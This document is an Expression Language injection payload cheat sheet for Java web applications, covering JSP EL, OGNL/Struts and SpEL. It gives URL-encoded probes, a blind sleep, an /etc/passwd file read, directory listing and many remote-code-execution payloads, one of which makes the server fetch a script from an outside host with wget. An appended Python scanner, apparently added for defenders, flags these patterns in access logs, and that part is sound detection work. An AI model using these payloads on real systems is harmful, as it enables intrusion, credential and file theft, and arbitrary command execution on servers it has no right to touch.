Expression Language injection
Description
Expression Languages (EL) make it possible to manipulate data inside a JSP page (or a *.tag file) more simply than with Java scriptlets.
An EL gives straightforward access to the beans in the web application's various scopes (page, request, session and application). Used together with tag libraries, it makes it possible to do without scriptlets entirely.
An EL expression has the following form:
The string expression is the expression to be interpreted. An expression may be made up of several terms separated by operators.
Reconnaissance
Character replacement
test${'str'.toString().replace('s', 'x')}ing # should return "textring"
Blind
# Sleeps for 10 seconds
https://target.com/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
RFI
https://target.com/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.REPLACE[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&REPLACE=%2fetc%2fpasswd
Directory listing
https://target.com/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.REPLACE[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&REPLACE=..
RCE
SpEL eval tag
T(java.lang.Runtime).getRuntime().exec("[COMMAND HERE]")
SpEL message tag
${java.lang.Runtime.getCurrentRuntime().exec("[COMMAND HERE]")}
Other payloads
''.class.forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec(<COMMAND STRING / ARRAY>)
''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance(<COMMAND ARRAY / LIST>).start()
// Runtime via getDeclaredConstructors
#{session.setAttribute("rtc", "".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])}
#{session.getAttribute("rtc").setAccessible(true)}
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")}
// Command execution via ProcessBuilder
${request.setAttribute("c", "".getClass().forName("java.util.ArrayList").newInstance())}
${request.getAttribute("c").add("cmd.exe")}
${request.getAttribute("c").add("/k")}
${request.getAttribute("c").add("ping x.x.x.x")}
${request.setAttribute("a", "".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
// Command execution via Reflection & Invoke
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
// Command execution via ScriptEngineManager
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")")}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");
// https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt
(T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("cmd "+T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))+"c "+T(java.lang.String).valueOf(new char[]{T(java.lang.Character).toChars(100)[0],T(java.lang.Character).toChars(105)[0],T(java.lang.Character).toChars(114)[0]})).getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()))
T(java.lang.System).getenv()[0]
T(java.lang.Runtime).getRuntime().exec('ping my-domain.com')
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c dir").getInputStream())
''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')
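Added here as a defender-side example (not part of the original page): a small Python scanner that URL-decodes the query string of access-log request lines and flags the EL/OGNL/SpEL shapes listed above. A bare `${...}` expression with no dangerous gadget (like the character-replacement probe) is graded medium, one that also carries a gadget such as `_memberAccess` or `getRuntime(` is graded high. The log lines and pattern lists are constructed for illustration and are not a complete signature set.

```python
import re
from urllib.parse import unquote

# Expression delimiters used by JSP EL, JSF EL, SpEL and the {{ }} variant on this page.
EL_DELIMITERS = re.compile(r"\$\{|#\{|\{\{|\bT\(")
# Gadget names taken from the payload shapes above; constructed, not exhaustive.
EL_GADGETS = re.compile(
    r"_memberAccess|DEFAULT_MEMBER_ACCESS|getRuntime\(|ProcessBuilder|"
    r"ScriptEngineManager|\.forName\(|ServletActionContext|FileInputStream|listFiles\("
)
# Request line of a common access-log format (constructed samples below).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalise(query: str) -> str:
    """URL-decode repeatedly (bounded) so double-encoded %2524%257b still unwraps to ${."""
    for _ in range(3):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    return query

def classify(query: str) -> dict:
    """Grade one query string: none / medium (EL syntax only) / high (syntax + gadget)."""
    text = normalise(query)
    has_delimiter = EL_DELIMITERS.search(text) is not None
    gadgets = sorted({m.group(0) for m in EL_GADGETS.finditer(text)})
    if has_delimiter and gadgets:
        level = "high"
    elif has_delimiter:
        level = "medium"  # looks like a recon probe, e.g. test${...}ing
    else:
        level = "none"
    return {"level": level, "gadgets": gadgets}

def scan_log(lines):
    """Return (path, level, gadgets) for every request line that looks like EL injection."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        result = classify(query)
        if result["level"] != "none":
            findings.append((path, result["level"], result["gadgets"]))
    return findings

SAMPLE_LOG = [  # constructed log lines, not real traffic
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=test%24%7B%27str%27.toString%28%29.replace%28%27s%27%2C%27x%27%29%7Ding HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS} HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=price%20%3C%2050 HTTP/1.1" 200 512',
]
```

Running `scan_log(SAMPLE_LOG)` flags the first two lines (medium, then high with both OGNL gadgets) and ignores the benign third one; the medium tier is where the `test${...}ing` probe from the Reconnaissance section shows up before any gadget is tried.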